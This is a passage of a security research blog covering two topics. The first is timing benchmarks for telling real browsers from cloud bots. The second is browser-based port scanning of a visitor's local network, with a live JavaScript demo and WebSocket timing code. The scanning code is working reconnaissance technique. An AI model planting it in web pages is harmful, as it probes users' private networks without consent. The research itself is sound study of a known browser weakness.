<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
</code></pre></div>
<p>Local Storage Differential Operation</p>
<p>This operation writes a 500 byte random string to local storage and reads it back
into an array. It is assumed that this operation has different running times on different computers.</p>
<div class="highlight"><pre><span></span><code><span class="kd">function</span> <span class="nx">localStorageOperation</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">randomStr</span> <span class="o">=</span> <span class="s2">"x"</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mf">495</span><span class="p">)</span> <span class="o">+</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">slice</span><span class="p">(</span><span class="mf">2</span><span class="p">,</span> <span class="mf">7</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">data</span> <span class="o">=</span> <span class="ow">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">localStorage</span><span class="p">.</span><span class="nx">setItem</span><span class="p">(</span><span class="s1">'lsDO'</span> <span class="o">+</span> <span class="nx">i</span><span class="p">,</span> <span class="nx">randomStr</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">1000</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">data</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="s1">'lsDO'</span> <span class="o">+</span> <span class="nx">i</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">diffStart</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="nx">localStorageOperation</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">diffTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">diffStart</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'diffTime: '</span> <span class="o">+</span> <span class="nx">diffTime</span><span class="p">);</span>
</code></pre></div>
<p>ReadPixels Differential Operation CPU - GPU Communication</p>
<p>This algorithm tests the communication latency
between the CPU and graphics card. It is assumed that generic cloud infrastructure
does not have a GPU available for each of their users. However, most normal users
have a GPU in their device. Therefore, it should be possible to see differentiable run times.</p>
<p>Due to the size of this algorithm, there will be a <a href="https://bot.incolumitas.com/redpill/webgl.html">link only here</a>.</p>
<h3>Visualization of Results</h3>
<script src="https://cdn.jsdelivr.net/npm/chart.js@2.8.0"></script>
<h4>Memory Baseline Operation</h4>
<canvas id="bl_memory" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Baseline Memory Local',
data: [
36.43499999998312, 17.12499999999295, 17.31000000000904,
19.140000000021473, 17.165000000005648, 17.6050000000032,
21.27500000000282, 19.634999999993852, 17.45499999998401,
19.34500000001549, 16.14000000000715, 16.91500000001156,
17.760000000009768, 17.380000000002838, 16.390000000001237,
14.525000000020327, 22.500000000007958, 20.6500000000176,
17.41000000001236, 22.305000000017117, 17.394999999993388,
17.19499999998675, 17.034999999992806, 18.585000000001628,
17.35999999999649, 18.660000000011223, 17.780000000016116,
18.124999999997726, 26.61000000000513, 14.90000000001146,
15.895000000000437, 17.77500000002874, 18.970000000024356,
19.054999999980282, 18.74499999996715, 15.405000000043856,
17.45499999998401, 19.099999999980355, 18.705000000011296,
16.675000000020646, 15.73999999999387, 21.00999999998976,
18.224999999972624, 18.190000000004147, 20.525000000020555,
17.56000000000313, 16.265000000032614, 16.25500000000102,
18.03499999999758, 18.020000000035452
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Baseline Memory AWS Lamda',
data: [
13.095000000248547, 8.78999999986263, 8.949999999458669,
12.715000000753207, 9.115000000747386, 9.425000000192085,
19.864999999981592, 8.724999999913052, 9.13500000001477,
11.300000000119326, 8.765000000039436, 17.25999999985106,
9.13500000001477, 10.854999999992287, 8.914999999888096,
9.360000000015134, 17.010000000027503, 8.964999999989232,
20.645000000058644, 8.885000000191212, 13.204999999970823,
9.434999999939464, 9.06499999996413, 8.935000000064974,
17.075000000204454, 17.014999999901192, 8.755000000064683,
8.619999999837091, 9.17499999991378, 8.765000000039436,
16.079999999874417, 8.835000000090076, 17.459999999800857,
12.999999999919964, 13.665000000173677, 8.95500000001448,
8.7149999999383, 9.149999999863212, 8.855000000039581,
9.310000000141372, 14.300000000048385, 13.12499999994543,
9.144999999989523, 9.02999999993881, 9.014999999862994,
9.270000000014988, 9.045000000014625, 12.759999999843785,
16.129999999975553, 9.90500000011707
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
],
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('bl_memory').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Text Baseline Operation</h4>
<canvas id="bl_text" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Baseline Text Local',
data: [
42.11500000008073, 43.679999999994834, 41.200000000003456,
40.68500000005315, 45.10000000004766, 41.66999999995369,
43.13000000001921, 45.03499999998439, 47.60499999997592,
45.0149999999212, 42.34499999995478, 44.12000000002081,
40.93000000000302, 46.08500000006188, 43.895000000020445,
38.904999999999745, 42.45500000001812, 44.61000000003423,
41.18500000004133, 42.374999999992724, 43.8649999999825,
43.50499999998192, 43.32499999998163, 44.91500000005999,
43.03000000004431, 45.745000000010805, 44.80999999998403,
45.16999999998461, 43.400000000019645, 42.955000000006294,
46.49500000004991, 42.50999999999294, 40.56500000001506,
44.475000000034015, 44.90499999997155, 44.09999999995762,
42.53500000004351, 45.43499999999767, 43.43000000005759,
42.39499999994223, 44.089999999982865, 41.59000000004198,
46.06999999998607, 47.10499999998774, 42.430000000081236,
48.18000000000211, 44.510000000059335, 42.96999999996842,
43.97000000005846, 45.649999999909596
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Baseline Text AWS Lambda',
data: [
37.06499999998414, 35.89000000010856, 39.91500000006454,
39.90499999986241, 39.980000000014115, 43.83000000007087,
39.23999999983607, 41.23499999991509, 39.4699999999375,
42.519999999967695, 40.01499999981206, 37.794999999960055,
39.43500000013955, 41.245000000117216, 37.055000000009386,
44.55000000007203, 39.76999999986219, 39.760000000114815,
41.62499999983993, 39.49000000011438, 37.60499999998501,
40.59999999981301, 39.344999999912034, 41.434999999864885,
39.14000000008855, 39.729999999963184, 39.04499999998734,
39.5250000001397, 40.015000000039436, 39.879999999811844,
40.26500000009037, 35.55499999993117, 39.42000000006374,
40.1400000000649, 41.005000000041036, 39.060000000063155,
41.3300000000163, 43.435000000044965, 39.63500000008935,
39.95499999996355, 40.38500000001477, 39.80500000011489,
39.64999999993779, 42.374999999992724, 39.8649999999634,
35.60499999980493, 39.774999999963256, 35.95499999983076,
39.82500000006439, 34.795000000030996
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('bl_text').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Console Differential Operation</h4>
<canvas id="do_console" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation Console Local',
data: [
165.11000000002696, 154.6650000000227, 162.59999999999764,
177.55499999998392, 178.28499999995984, 165.11000000002696,
157.62999999992644, 165.31499999996413, 159.43000000004304,
153.81999999999607, 182.8249999999798, 157.6350000000275,
151.70499999999265, 163.01999999996042, 153.80000000004657,
153.13999999989392, 154.56499999993412, 152.85999999991873,
161.71999999994568, 162.93499999994765, 166.89999999994143,
152.48000000008233, 148.12500000005002, 161.64000000003398,
160.59000000007018, 162.30499999994663, 155.3399999999101,
159.84500000001844, 155.90499999996155, 149.13500000000113,
151.25000000000455, 170.18499999994674, 147.96000000001186,
157.48499999995147, 157.615000000078, 156.58499999995,
139.79500000004919, 154.3699999999717, 155.5749999999989,
143.5550000001058, 153.16999999981817, 150.71000000011736,
162.87499999998545, 161.70999999985725, 157.9300000000785,
164.3549999998868, 163.56499999983498, 157.4950000001536,
156.34000000000015, 153.7550000000465
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation Console AWS Lambda',
data: [
280.05499999994754, 236.0200000000532, 272.27499999980864,
306.4050000000407, 237.0650000000296, 263.9000000001488,
206.92000000008193, 191.82500000010805, 280.94000000010055,
251.5600000001541, 251.96999999980108, 183.69499999994332,
261.7199999999684, 260.3750000000673, 192.5250000001597,
245.05999999996675, 130.85000000000946, 123.81500000014967,
207.2849999999562, 260.9099999999671, 178.47499999993488,
221.73500000008062, 250.30500000002576, 224.66999999983273,
240.76000000013664, 205.5249999998523, 246.75000000002,
206.9850000000315, 339.81500000004417, 272.23000000003594,
157.10500000000138, 204.81500000005326, 220.00499999990097,
166.55999999989035, 218.3599999998478, 161.90000000005966,
201.0400000001482, 225.19000000011147, 221.56500000005508,
136.72999999994317, 246.03000000001884, 182.9400000001442,
157.69999999997708, 297.7899999998499, 251.4099999998507,
226.83499999993728, 164.45500000008906, 152.4850000000697,
121.30000000024665, 271.9350000002123
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_console').getContext('2d');
new Chart(ctx, options);
</script>
<h4>Local Storage Differential Operation</h4>
<canvas id="do_localstorage" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation Localstorage Local',
data: [
42.50000000001819, 46.99500000015178, 47.795000000178334,
54.47499999991123, 46.26500000017586, 47.15999999984888,
47.19000000000051, 50.50000000005639, 47.21500000005108,
52.86999999998443, 48.74499999982618, 38.105000000086875,
44.390000000021246, 47.410000000127184, 46.965000000000146,
49.38500000002932, 45.4650000001493, 46.13499999982196,
50.975000000107684, 45.54000000007363, 52.20499999995809,
45.74999999999818, 47.16499999994994, 48.54000000000269,
43.53999999989355, 49.18499999985215, 47.52499999995052,
47.09000000002561, 46.68500000002496, 48.2600000000275,
45.03500000009808, 47.480000000177824, 46.52000000010048,
54.575000000113505, 43.7050000000454, 52.79999999993379,
50.695000000132495, 49.854999999979555, 48.07499999992615,
49.409999999852516, 48.99000000000342, 47.12000000017724,
47.93499999982487, 51.120000000082655, 47.00500000012653,
54.694999999810534, 40.65500000001521, 45.22999999994681,
50.585000000182845, 44.64000000007218
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation Localstorage AWS Lambda',
data: [
19.11500000005617, 21.079999999983556, 16.65000000002692,
20.10999999993146, 19.28000000020802, 18.71500000015658,
28.279999999995198, 19.170000000030996, 19.61499999993066,
19.054999999980282, 19.11500000005617, 19.594999999981155,
22.795000000087384, 19.244999999955326, 19.1899999999805,
19.21500000003107, 21.7649999999594, 21.58499999995911,
21.72500000006039, 21.869999999807987, 22.890000000188593,
27.434999999968568, 19.21500000003107, 20.009999999956563,
16.810000000077707, 21.989999999959764, 19.81999999998152,
19.1899999999805, 18.929999999954816, 19.880000000057407,
22.940000000062355, 22.085000000060973, 21.610000000009677,
19.534999999905267, 19.924999999830106, 22.590000000036525,
18.58999999990374, 17.119999999977153, 20.20000000015898,
21.140000000059445, 18.964999999980137, 18.90000000003056,
21.415000000160944, 20.430000000033033, 14.715000000023792,
23.519999999962238, 18.87999999985368, 21.08500000008462,
18.40500000002976, 19.489999999905194
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_localstorage').getContext('2d');
new Chart(ctx, options);
</script>
<h4>WebGL Differential Operation</h4>
<canvas id="do_webgl" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32,
33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43,
44, 45, 46, 47, 48, 49
],
datasets: [
{
label: 'Differential Operation WebGL Local',
data: [
205.8599999999584, 164.30999999997198, 151.09999999999957,
166.5050000000008, 163.05000000002678, 141.15500000002612,
166.55500000003087, 159.93499999997596, 165.31499999999255,
156.6450000000117, 162.33999999997195, 193.82499999993286,
157.66999999995335, 196.544999999972, 174.0499999999372,
186.08499999997719, 154.7750000000434, 179.27000000000248,
131.03999999995608, 190.90499999998656, 146.65499999992448,
146.9950000000324, 173.29999999998336, 155.68500000017593,
159.53500000020426, 157.53000000006523, 175.3950000000657,
136.48999999992384, 169.66500000003748, 154.68500000014274,
161.88000000011016, 194.89999999981933, 170.10499999994977,
160.80999999996948, 168.57499999997572, 166.4449999999249,
180.7499999999891, 151.15000000000123, 169.2899999999895,
163.70000000006257, 182.30999999997266, 167.1150000000523,
162.94499999995082, 148.23499999982914, 176.09499999994682,
165.60000000012565, 167.57499999994252, 189.99000000007982,
167.17000000008397, 174.82999999998583
],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Differential Operation WebGL AWS Lambda',
data: [
854.829999996582, 878.7300000003597, 873.0300000006537,
863.5950000025332, 866.7700000096374, 871.6849999982514,
867.2549999955663, 837.3700000047393, 879.4600000001083,
878.1399999988935, 860.7549999960611, 855.2949999957491,
868.0599999988772, 880.7199999955628, 860.8800000019983,
859.3499999988126, 864.4700000022567, 858.4999999948195,
857.7550000045449, 865.4550000082963, 842.7250000077038,
854.6750000041357, 853.7799999976414, 861.3900000127614,
862.1300000049814, 865.2100000035716, 853.7000000014814,
860.530000005383, 854.5000000030996, 850.7299999964744,
875.0750000017433, 845.565000005081, 852.9399999970337,
854.36499998832, 841.245000005074, 863.7799999942217,
870.0650000027963, 901.4749999987544, 868.7799999970593,
879.560000003039, 885.2350000015576, 860.0699999951757,
883.0899999975372, 842.4200000008568, 876.2749999950756,
863.1449999957113, 860.8500000027561, 867.0449999954144,
876.0250000050291, 866.150000008929
],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
},
{
label: 'do_webgl phone',
data: [850, 836, 799, 804, 810, 859, 733, 896, 793, 799, 803, 821, 807, 779, 759, 724, 906,
726, 846, 833, 830, 778, 770, 842, 814, 804, 783, 829, 754, 914, 748, 817, 828, 812, 810],
borderWidth: 1,
borderColor: 'rgba(0, 0, 255, 0.3)',
},
]
},
options: {
scales: {
yAxes: [{
ticks: {
beginAtZero: true
}
}]
}
}
}
var ctx = document.getElementById('do_webgl').getContext('2d');
new Chart(ctx, options);
</script>
<h3>Other Sources</h3>
<p><a href="https://news.ycombinator.com/item?id=20481291">Hacker News Discussion of other Red Pill techniques</a></p>Browser based Port Scanning with JavaScript2021-01-10T22:06:00+01:002021-01-10T22:06:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-10:/2021/01/10/browser-based-port-scanning/<p>In this article, various techniques to conduct port scanning from within the browser are developed. Modern JavaScript is used.</p><h2>Demo</h2>
<p>The demo below will port scan any host and port from withing your local network.</p>
<div>
<input type="text" id="host" name="host" minlength="6" maxlength="50" value="localhost" style="padding: 3px">
<input type="text" id="port" name="port" minlength="2" maxlength="5" value="8888" style="padding: 3px">
<button id="portScan" onclick="startScan()" style="padding: 3px">Start Portscan</button>
<p id="portScanMeta" style="marginTop: 20px"><p>
</div>
<script>
// Author: Nikolai Tschacher
// tested on Chrome v86 on Ubuntu 18.04
var portIsOpen = function(hostToScan, portToScan, N) {
return new Promise((resolve, reject) => {
var portIsOpen = 'unknown';
var timePortImage = function(port) {
return new Promise((resolve, reject) => {
var t0 = performance.now()
// a random appendix to the URL to prevent caching
var random = Math.random().toString().replace('0.', '').slice(0, 7)
var img = new Image;
img.onerror = function() {
var elapsed = (performance.now() - t0)
// close the socket before we return
resolve(parseFloat(elapsed.toFixed(3)))
}
img.src = "http://" + hostToScan + ":" + port + '/' + random + '.png'
})
}
const portClosed = 37857; // let's hope it's closed :D
(async () => {
var timingsOpen = [];
var timingsClosed = [];
for (var i = 0; i < N; i++) {
timingsOpen.push(await timePortImage(portToScan))
timingsClosed.push(await timePortImage(portClosed))
}
var sum = (arr) => arr.reduce((a, b) => a + b);
var sumOpen = sum(timingsOpen);
var sumClosed = sum(timingsClosed);
var test1 = sumOpen >= (sumClosed * 1.3);
var test2 = false;
var m = 0;
for (var i = 0; i <= N; i++) {
if (timingsOpen[i] > timingsClosed[i]) {
m++;
}
}
// 80% of timings of open port must be larger than closed ports
test2 = (m >= Math.floor(0.8 * N));
portIsOpen = test1 && test2;
resolve([portIsOpen, m, sumOpen, sumClosed]);
})();
});
}
var startScan = function (event) {
var host = document.getElementById('host').value;
var port = document.getElementById('port').value;
var N = 30;
if (!['localhost', '127.0.0.1'].includes(host.trim())) {
N = 5;
}
portIsOpen(host, port, N).then((res) => {
let [isOpen, m, sumOpen, sumClosed] = res;
document.getElementById('portScanMeta').innerHTML = "m/N = " + m + "/" + N + ", sumOpen=" + sumOpen.toFixed(2) + ", sumClosed=" + sumClosed.toFixed(2) + " factor=" + (sumOpen/sumClosed).toFixed(2);
alert(host + ':' + port + ' is open: ' + isOpen);
})
}
</script>
<h3>Goal</h3>
<p>The goal of this article is to conduct port scanning with JavaScript. Various ports on the domain <code>localhost</code> should be scanned. It is assumed that our origin is a <code>https</code> site, such as for example <code>https://incolumitas.com</code>.</p>
<p>A Ubuntu 18.04 Linux system with a recent chrome browser will be used (Chrome/86.0.4240.75).</p>
<p>Port scanning from within the browser <a href="https://news.ycombinator.com/item?id=23246170">recently caused quite some uproar</a>, when a security researcher observed that Ebay is port scanning his local network from within the browser. Here is another article that goes into <a href="https://blog.nem.ec/2020/05/24/ebay-port-scanning/">much more technical detail</a> compared to the previous one and tries to debug and reverse engineer the port scanning source code from the responsible company ThreatMatrix.</p>
<p>However, browser port scanning is known much longer than that. In fact, as long as you can use JavaScript and there is no strict same origin policy, it will likely be possible. </p>
<h3>The Idea</h3>
<p>When creating a WebSocket object </p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8888/"</span><span class="p">)</span>
</code></pre></div>
<p>that points to local HTTP server started with the command <code>python -m http.server --bind 127.0.0.1 8888</code>, we get the following JavaScript error in the developer console:</p>
<div class="highlight"><pre><span></span><code>WebSocket connection to 'ws://127.0.0.1:8888/' failed:
Error during WebSocket handshake: Unexpected response code: 404
</code></pre></div>
<p>On the other side, when creating a WebSocket object </p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
</code></pre></div>
<p>with a URL that points to non-existent service on port 8889, we get the following error in the developer console</p>
<div class="highlight"><pre><span></span><code>WebSocket connection to 'ws://127.0.0.1:8889/' failed:
Error in connection establishment: net::ERR_CONNECTION_REFUSED
</code></pre></div>
<p>Boom. Problem solved. We can distinguish solely based on error messages whether a port is open or not.</p>
<p>Not so fast. </p>
<p>When trying to grab the error information with </p>
<div class="highlight"><pre><span></span><code><span class="c1">// outputs: Error: null</span>
<span class="kd">var</span> <span class="nx">errorMessage</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">try</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
<span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this code will never run</span>
<span class="nx">errorMessage</span> <span class="o">=</span> <span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">();</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Error: '</span> <span class="o">+</span> <span class="nx">errorMessage</span><span class="p">)</span>
</code></pre></div>
<p>we get a meager output of <code>Error: null</code>. The error that is shown in the console, is not accessible to JavaScript!</p>
<p>But since we are very smart, we try to get error details via the <code>WebSocket.onerror</code> event handler:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:8889/"</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"WebSocket error observed:"</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span>
<span class="p">};</span>
</code></pre></div>
<p>However, the <code>error</code> object does not differ for the two cases. Based on the <code>error</code> object, it is not possible to determine
whether the port was open or not!</p>
<p>The same applies to <code><img></code> tags.</p>
<p>The following code will not reveal error information that helps us to infer whether the port was open or not:</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">();</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s2">"Image error observed:"</span><span class="p">,</span> <span class="nx">error</span><span class="p">);</span>
<span class="p">};</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://127.0.0.1:8889/"</span><span class="p">;</span>
</code></pre></div>
<p>There is simply not much information in the <code>onerror</code> kind of event messages available in JavaScript.</p>
<p>What to do? </p>
<p>Yes you guessed correctly.</p>
<p>We will attempt to check if we can detect open ports by measuring the response times ;)</p>
<h3>About Timing Measurements in JavaScript</h3>
<p>The most precise time measurements can be obtained via <a href="https://developer.mozilla.org/en-US/docs/Web/API/Performance/now">performance.now()</a>.</p>
<p>One problem is that <code>performance.now()</code> has reduced accuracy as the following <a href="https://news.ycombinator.com/item?id=16103270">Hacker News discussion</a> states. If I am not mistaken, accuracy was reduced to prevent Spectre and Meltdown kind of bugs.</p>
<p>The following snippet showcases <code>performance.now()</code> accuracy:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="p">[]</span>
<span class="kd">let</span> <span class="nx">then</span> <span class="o">=</span> <span class="mf">0</span>
<span class="k">for</span><span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="mf">500</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">now</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">abs</span><span class="p">(</span><span class="nx">now</span> <span class="o">-</span> <span class="nx">then</span><span class="p">)</span> <span class="o">></span> <span class="mf">1e-6</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">now</span><span class="p">)</span>
<span class="nx">then</span> <span class="o">=</span> <span class="nx">now</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="s2">"\n"</span><span class="p">))</span>
</code></pre></div>
<p>Based on the script above, it seems that the accuracy is fine grained enough for our use case.</p>
<p>To measure network and socket timeouts, we need single digit millisecond accuracy. According to the hacker news link above, chrome has accuracy of <strong>accurate to 100us</strong>. This is more than enough for our use case.</p>
<h3>Port Scanning with Web Sockets</h3>
<p>My first attempt was to use <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebSocket">WebSockets</a> to conduct localhost port scanning. I came up with the following JavaScript that measures WebSocket connection timeouts:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// start local server with</span>
<span class="c1">// python -m http.server --bind 127.0.0.1 8888</span>
<span class="kd">var</span> <span class="nx">checkPort</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">ws</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s2">"ws://127.0.0.1:"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">status</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">status</span> <span class="o">=</span> <span class="s1">'onerror: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">onclose</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="nx">status</span> <span class="o">=</span> <span class="s1">'onclose: '</span> <span class="o">+</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">setTimeout</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">status</span><span class="p">)</span>
<span class="nx">ws</span><span class="p">.</span><span class="nx">close</span><span class="p">()</span>
<span class="p">},</span> <span class="mf">200</span><span class="p">)</span>
<span class="p">}</span>
<span class="nx">checkPort</span><span class="p">(</span><span class="mf">8888</span><span class="p">)</span>
</code></pre></div>
<p>The idea is the following: I want to test if the above snippet yields significantly different timeouts for a URL that
points to a open TCP service compared to URL with a port where no service is running.</p>
<p>First, I started a simple HTTP server on the port 8888 with the command </p>
